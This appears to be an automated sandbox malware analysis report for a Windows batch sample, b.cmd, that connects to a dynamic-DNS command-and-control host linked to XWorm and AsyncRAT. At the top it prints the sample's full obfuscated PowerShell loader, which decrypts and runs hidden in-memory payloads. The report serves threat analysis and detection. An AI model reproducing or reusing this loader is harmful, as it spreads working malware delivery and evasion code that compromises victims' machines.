Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\b.cmd';$rwnt='decpxhcopxhcmppxhcrespxhcspxhc'.replace('pxhc', ''),'matgyrintgyrmtgyrotgyrdtgyrultgyretgyr'.replace('tgyr', ''),'cryskteysktateysktdyskteysktcrysktypyskttoysktryskt'.replace('yskt', ''),'idnlzndnlzvdnlzokdnlzednlz'.replace('dnlz', ''),'tragoiknsfgoikogoikrmfgoikinagoiklblgoikockgoik'.replace('goik', ''),'lostknadstkn'.replace('stkn', ''),'fromxwcmbamxwcse6mxwc4stmxwcrimxwcngmxwc'.replace('mxwc', ''),'enrgyjtrrgyjyrgyjporgyjinrgyjtrgyj'.replace('rgyj', ''),'cqjguopqjguyqjgutqjguoqjgu'.replace('qjgu', ''),'elywteeywtemenywtetaywtetywte'.replace('ywte', ''),'reampxgdlmpxginempxgsmpxg'.replace('mpxg', ''),'ceuhlheuhlangeuhleexeuhlteeuhlnseuhlioneuhl'.replace('euhl', ''),'sklteplikltetklte'.replace('klte', ''),'gzasmetzasmcuzasmrrzasmentzasmprzasmocezasmszasmszasm'.replace('zasm', '');powershell -w hidden;function ogeim($xyfkn){$kstrb=[system.security.cryptography.aes]::create();$kstrb.mode=[system.security.cryptography.ciphermode]::cbc;$kstrb.padding=[system.security.cryptography.paddingmode]::pkcs7;$kstrb.key=[system.convert]::($rwnt[6])('xa1+wtjapcusoel/am8gyjpdfxchazsse7o9jqgg6te=');$kstrb.iv=[system.convert]::($rwnt[6])('o+k4tdvdsxdevrbsexqo5q==');$ooabi=$kstrb.($rwnt[2])();$gcrfy=$ooabi.($rwnt[4])($xyfkn,0,$xyfkn.length);$ooabi.dispose();$kstrb.dispose();$gcrfy;}function bkqvc($xyfkn){$pxxpg=new-object system.io.memorystream(,$xyfkn);$ztkwm=new-object system.io.memorystream;$rxder=new-object system.io.compression.gzipstream($pxxpg,[io.compression.compressionmode]::($rwnt[0]));$rxder.($rwnt[8])($ztkwm);$rxder.dispose();$pxxpg.dispose();$ztkwm.dispose();$ztkwm.toarray();}$qawhk=[system.io.file]::($rwnt[10])([console]::title);$toeth=bkqvc (ogeim ([convert]::($rwnt[6])([system.linq.enumerable]::($rwnt[9])($qawhk, 5).substring(2))));$kobgz=bkqvc (ogeim ([convert]::($rwnt[6])([system.linq.enumerable]::($rwnt[9])($qawhk, 6).substring(2))));[system.reflection.assembly]::($rwnt[5])([byte[]]$kobgz).($rwnt[7]).($rwnt[3])($null,$null);[system.reflection.assembly]::($rwnt[5])([byte[]]$toeth).($rwnt[7]).($rwnt[3])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation
1
DLL Side-Loading
11
Process Injection
1
Masquerading
OS Credential Dumping12
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter
Boot or Logon Initialization Scripts1
DLL Side-Loading
131
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
Logon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager131
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture11
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542729 Sample: b.cmd Startdate: 26/10/2024 Architecture: WINDOWS Score: 84 31 dcxwq1.duckdns.org 2->31 35 Multi AV Scanner detection for domain / URL 2->35 37 Suricata IDS alerts for network traffic 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 AI detected suspicious sample 2->41 9 cmd.exe 1 2->9         started        signatures3 43 Uses dynamic DNS services 31->43 process4 signatures5 49 Obfuscated command line found 9->49 12 cmd.exe 1 9->12         started        15 conhost.exe 9->15         started        17 cmd.exe 1 9->17         started        process6 signatures7 51 Obfuscated command line found 12->51 19 powershell.exe 28 12->19         started        23 conhost.exe 12->23         started        25 cmd.exe 1 12->25         started        27 cmd.exe 12->27         started        process8 dnsIp9 33 dcxwq1.duckdns.org 101.99.92.203, 49732, 7000 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 19->33 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->45 47 Suspicious powershell command line found 19->47 29 powershell.exe 28 19->29         started        signatures10 process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
b.cmd5%VirustotalBrowse
b.cmd24%ReversingLabsScript-BAT.Trojan.Alien
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
dcxwq1.duckdns.org12%VirustotalBrowse
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
https://github.com/Pester/Pester1%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
dcxwq1.duckdns.org
101.99.92.203
truetrueunknown
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1771404228.000001FCB7943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA7B5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1771404228.000001FCB780D000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmpfalseunknown
https://go.micropowershell.exe, 00000008.00000002.1756758005.000001FCA8CB2000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1771404228.000001FCB7943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA7A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1771404228.000001FCB780D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://contoso.com/Licensepowershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/Iconpowershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://oneget.orgXpowershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://aka.ms/pscore68powershell.exe, 00000008.00000002.1756758005.000001FCA7781000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.apache.opowershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmpfalse
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1756758005.000001FCA7781000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://oneget.orgpowershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    101.99.92.203
    dcxwq1.duckdns.orgMalaysia
    45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1542729
    Start date and time:2024-10-26 08:50:07 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 6m 56s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:13
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:b.cmd
    Detection:MAL
    Classification:mal84.troj.evad.winCMD@15/7@3/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 56%
    • Number of executed functions: 8
    • Number of non-executed functions: 4
    Cookbook Comments:
    • Found application associated with file extension: .cmd
    • Override analysis time to 240s for powershell
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    TimeTypeDescription
    02:51:03API Interceptor14918550x Sleep call for process: powershell.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    101.99.92.203rrwzOU7A9F.exeGet hashmaliciousXWormBrowse
      3xlcP3DFLm.exeGet hashmaliciousXWormBrowse
        JruZmEO5Dm.exeGet hashmaliciousXWormBrowse
          zVlbADkNqu.exeGet hashmaliciousXWormBrowse
            vqUuq8t2Uc.exeGet hashmaliciousAsyncRAT, DcRatBrowse
              pXJ9iQvcQa.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                dcxwq1.duckdns.orgrrwzOU7A9F.exeGet hashmaliciousXWormBrowse
                • 101.99.92.203
                3xlcP3DFLm.exeGet hashmaliciousXWormBrowse
                • 101.99.92.203
                JruZmEO5Dm.exeGet hashmaliciousXWormBrowse
                • 101.99.92.203
                zVlbADkNqu.exeGet hashmaliciousXWormBrowse
                • 101.99.92.203
                vqUuq8t2Uc.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                • 101.99.92.203
                pXJ9iQvcQa.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                • 101.99.92.203
                a.cmdGet hashmaliciousUnknownBrowse
                • 91.92.249.117
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYrrwzOU7A9F.exeGet hashmaliciousXWormBrowse
                • 101.99.92.203
                3xlcP3DFLm.exeGet hashmaliciousXWormBrowse
                • 101.99.92.203
                JruZmEO5Dm.exeGet hashmaliciousXWormBrowse
                • 101.99.92.203
                zVlbADkNqu.exeGet hashmaliciousXWormBrowse
                • 101.99.92.203
                vqUuq8t2Uc.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                • 101.99.92.203
                pXJ9iQvcQa.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                • 101.99.92.203
                https://app.adjust.com/mr11ui?fallback=https://abcshopbd.com/#amVmZi5kaXhvbiRhdXN0YWx1c2EuY29tGet hashmaliciousHTMLPhisherBrowse
                • 111.90.141.53
                Transferencias6231.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 101.99.94.195
                Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 101.99.94.195
                Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 101.99.94.195
                No context
                No context
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):9713
                Entropy (8bit):4.940954773740904
                Encrypted:false
                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                MD5:BA7C69EBE30EC7DA697D2772E36A746D
                SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):2832
                Entropy (8bit):5.414030276061799
                Encrypted:false
                SSDEEP:48:0AzsSU4y4RQmFoUeCamfm9qr9t5/78NV4GxJZKaVEouYAgwd64rHLjtvz:0AzlHyIFKL2O9qrh7KrJ5Eo9Adrxz
                MD5:C3CCD80280C787F6D85E19A6DEF1CB5A
                SHA1:DB0C3BC59CFCDA67F05BCB8E2711871A1D806A9F
                SHA-256:53519FEA01AFDB161253AE215A668C729AACC17A9E1073D74C5CE421BA9C37CC
                SHA-512:64D376AA8B657F95FEE06AC0827205141F91D8D99B205D527FD35C987710328A897CF832683AD14181535D1740AE45CD1DC24878BC840E8E6B9D7AE2B3118A1F
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
